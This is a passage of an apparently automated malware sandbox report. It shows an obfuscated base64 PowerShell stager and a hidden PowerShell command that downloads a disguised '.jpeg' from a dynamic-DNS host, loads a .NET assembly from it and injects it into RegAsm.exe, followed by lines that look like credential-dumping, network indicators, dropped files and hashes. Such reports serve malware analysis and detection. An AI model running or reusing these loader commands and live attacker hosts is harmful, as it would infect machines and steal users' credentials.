㏴HQ≩ ⫻ ㏤ ≪ ㏴aQB2≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴H0≩ ⫻ ㏤ ≪ ㏴';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\rkoyhe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\bmtjhwxlv"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mgzbapifjtkx"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mgzbapifjtkx"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mgzbapifjtkx"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | 135.192.173.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
| US | 8.8.8.8:53 | 236.76.55.191.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | wemberdag.duckdns.org | udp |
| MY | 103.186.116.99:31388 | wemberdag.duckdns.org | tcp |
| US | 8.8.8.8:53 | 99.116.186.103.in-addr.arpa | udp |
| MY | 103.186.116.99:31388 | wemberdag.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
memory/4672-0-0x00000000711BE000-0x00000000711BF000-memory.dmp
memory/4672-1-0x0000000003080000-0x00000000030B6000-memory.dmp
memory/4672-2-0x0000000005C30000-0x0000000006258000-memory.dmp
memory/4672-3-0x00000000711B0000-0x0000000071960000-memory.dmp
memory/4672-4-0x00000000711B0000-0x0000000071960000-memory.dmp
memory/4672-5-0x0000000005AF0000-0x0000000005B12000-memory.dmp
memory/4672-6-0x0000000005B90000-0x0000000005BF6000-memory.dmp
memory/4672-7-0x0000000006260000-0x00000000062C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1jzzr1ur.xhg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4672-13-0x0000000006390000-0x00000000066E4000-memory.dmp
memory/4672-18-0x00000000069B0000-0x00000000069CE000-memory.dmp
memory/4672-19-0x00000000069F0000-0x0000000006A3C000-memory.dmp
memory/4672-21-0x000000006DA70000-0x000000006DABC000-memory.dmp
memory/4672-22-0x00000000711B0000-0x0000000071960000-memory.dmp
memory/4672-23-0x000000006DDE0000-0x000000006E134000-memory.dmp
memory/4672-33-0x0000000006F60000-0x0000000006F7E000-memory.dmp
memory/4672-20-0x0000000006F80000-0x0000000006FB2000-memory.dmp
memory/4672-35-0x0000000007980000-0x0000000007A23000-memory.dmp
memory/4672-34-0x00000000711B0000-0x0000000071960000-memory.dmp
memory/4672-36-0x0000000008340000-0x00000000089BA000-memory.dmp
memory/4672-37-0x0000000007D00000-0x0000000007D1A000-memory.dmp
memory/4672-38-0x0000000007D70000-0x0000000007D7A000-memory.dmp
memory/4672-39-0x0000000007F90000-0x0000000008026000-memory.dmp
memory/4672-40-0x0000000007EF0000-0x0000000007F01000-memory.dmp
memory/4672-41-0x0000000007F20000-0x0000000007F2E000-memory.dmp
memory/4672-42-0x0000000007F30000-0x0000000007F44000-memory.dmp
memory/4672-43-0x0000000007F70000-0x0000000007F8A000-memory.dmp
memory/4672-44-0x0000000007F60000-0x0000000007F68000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\qhsluqks\qhsluqks.cmdline
| MD5 | f2c3741dc37c443db3eccc18545e8763 |
| SHA1 | 6ccfbbaff14142cdc4c000b09c3cce8e712fd2f7 |
| SHA256 | 09788deb1242de9110e9728ab742d53dc9f49e5920b31f651928236680437f0a |
| SHA512 | bcc8552d8c88383cce13d81b9525ee15d7534abf10518e63bfdfdbc9579aa0e6713bd932db8bc8e80eab226ab6fbc9c67181d546ce4c2d591b12bde54c193607 |
\??\c:\Users\Admin\AppData\Local\Temp\qhsluqks\qhsluqks.0.cs
| MD5 | d71dc34ff8dbecd13f179ed952a841d5 |
| SHA1 | 78c3b0d410495a39154fbd26663468d6e5de5768 |
| SHA256 | 19b4037d5d9fa1532eb40ab0f16ad5a5c96cb3d9d3ab27b3e4e82ea74f3cf175 |
| SHA512 | 2b6397a38038caa9b412460801b007615461db4f8e24a8896f17cad90bc5d50286682387cc524aee6c3a38172d9932a125aef07c5ebdcc406ef7203a577aa84f |
\??\c:\Users\Admin\AppData\Local\Temp\qhsluqks\CSC808E1BBE59894277B6474D5926CDD25.TMP
| MD5 | 7e3e18909e96e19572d363dc034c62a2 |
| SHA1 | 4d17259fe45916ff4504f31b72fd3b5469b8a398 |
| SHA256 | ef3a05c0a845f1e1537ff4bd1b9925be17a1fe6fff60b92691157308203b1dd6 |
| SHA512 | da22c156384a07083f74b2a7ae4ba9f58affbe08e3b4151f9a9e64c3a00d7ac827c4f057304f2a7316b727ef1b93370ef754595f680b9b5e1dbac6f1dc4ecb62 |
C:\Users\Admin\AppData\Local\Temp\RES9877.tmp
| MD5 | 754519fc0c28880a3589458850162b40 |
| SHA1 | dff8f7bdbebb53108680144a5882e591a40599ca |
| SHA256 | e12efdcc4ef6361ee68f0f0fed89b9949c79d0c60e1e2a364eb94484a57dfd80 |
| SHA512 | e3e428ffb80f9c2b28064297aa873c7ae153d95669d6fe9af99074bb4eb371617b9bad8ad976719e6458df25191abdd4e2343db68472ba0032b032a511437abd |
C:\Users\Admin\AppData\Local\Temp\qhsluqks\qhsluqks.dll
| MD5 | b4ad76fba3980db8d7a84ea5fc55998e |
| SHA1 | f3c842ef98623275159272b6d7af898dc9d700b6 |
| SHA256 | 08c8273d8fa35a907366205150536f2f6b1dc7b973b74aeb315c73c25285e379 |
| SHA512 | 0f536a514b601f1eb652b07700dfc0ee456d4527812d4773e01a9430700db0d048402876d92c38c8fff46e08fde3d33948343db294b867bdf52ef27cc057688a |
memory/4672-57-0x0000000007F60000-0x0000000007F68000-memory.dmp
memory/4672-63-0x0000000008210000-0x0000000008232000-memory.dmp
memory/4672-64-0x0000000008F70000-0x0000000009514000-memory.dmp
C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS
| MD5 | 7788462fff77921361629f1053e761ec |
| SHA1 | 9414413ddaa18d38c3f7cd7119e1958e8afcb5df |
| SHA256 | fc4746b756fb20e572af314479447accf175c9eddfac1ea9b73326c2f410a753 |
| SHA512 | e4a138ad53a31d60c6db73da16ceb4f15d9d40639b72e1c5e872492b7a25aa32ad7ed8aacb64bc9379a735c49786a35edf200e652876f70e3009aba6326abbc5 |
memory/4672-70-0x00000000711B0000-0x0000000071960000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 9faf6f9cd1992cdebfd8e34b48ea9330 |
| SHA1 | ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e |
| SHA256 | 0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953 |
| SHA512 | 05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97 |
memory/3132-72-0x0000000005880000-0x0000000005BD4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f7d59c720e15134ba7fa2f175b7ec52c |
| SHA1 | 053c0e6f16788e7c0ba5a8a1bc51ff3085bb0b95 |
| SHA256 | 8486d9b72114924ea320307f73daa6bfa30f6fafbd581ab5c4d983b25c924906 |
| SHA512 | 171e1084ac4a79bfff9ebd56e56991e1bf36bfe0674162c8cbccbaeed4e6227343d2f5d026d6c64bdac70668718c1fdbf11ac350a20affd558dcd381759cf339 |
memory/412-93-0x0000000007670000-0x0000000007792000-memory.dmp
memory/412-94-0x0000000004F10000-0x0000000004FAC000-memory.dmp
memory/4804-95-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-97-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-103-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-100-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-99-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-104-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fb983e339779d72b86d745964faca198 |
| SHA1 | f9a3e44f99c5eedea71f764a18aa3940a77f2d5e |
| SHA256 | 85298cd20df9a17bee5f2ce98ab106a44bab8aaa7455eec28b60f92ac0a89796 |
| SHA512 | 0c040c9aaa9310ec83e7755fc532515112bde342db76089d69647222fe4f4920988c87d957df93d98420f82319dd6fefcaa76cb7d7a7cf01d643abcdde648157 |
C:\Users\Admin\AppData\Roaming\logs\logs.dat
| MD5 | 88bd17dd9ff1bb7d5d3cad228d1edf41 |
| SHA1 | 354afa8e37991a0fa7c295308f976806d3736a2c |
| SHA256 | 2c4abefaac6383c39af8bf33a7f9d7387018d21f57861f69194c9ef07a1a4b72 |
| SHA512 | e2c7ec88f82afc5dcb3123c1b5d3903da178c838108e3b9597fd3370d50d8afc8be08791556cf8da667631540f129be3dcc103628f00f00cdbd070fb968e532a |
memory/4804-112-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-114-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-115-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-113-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-117-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-121-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-122-0x0000000000400000-0x0000000000482000-memory.dmp
memory/2664-130-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2664-132-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2664-135-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3168-139-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3168-137-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3168-136-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3136-134-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3136-133-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3136-129-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2664-128-0x0000000000400000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rkoyhe
| MD5 | 8b8277c8f03c24d1f290dbe476e961d2 |
| SHA1 | 2e13baf3a4b708277d550dc3dd1e0f99b131f78e |
| SHA256 | 9af6881f6dbffba028a7a977f4c0a43c764f840332986993ad66de7b816c2f9e |
| SHA512 | 7367a0236cd0d6cd731caf1ba1f4ea8f851ea1018a9c6b49db6e9d13b2aaba92767774da9169481918e4287021ff5c3a58c3143eaa5e7fe9fa88383208615948 |
memory/4804-144-0x0000000010000000-0x0000000010019000-memory.dmp
memory/4804-148-0x0000000010000000-0x0000000010019000-memory.dmp
memory/4804-149-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-147-0x0000000010000000-0x0000000010019000-memory.dmp
memory/4804-151-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4804-152-0x0000000000400000-0x0000000000482000-memory.dmp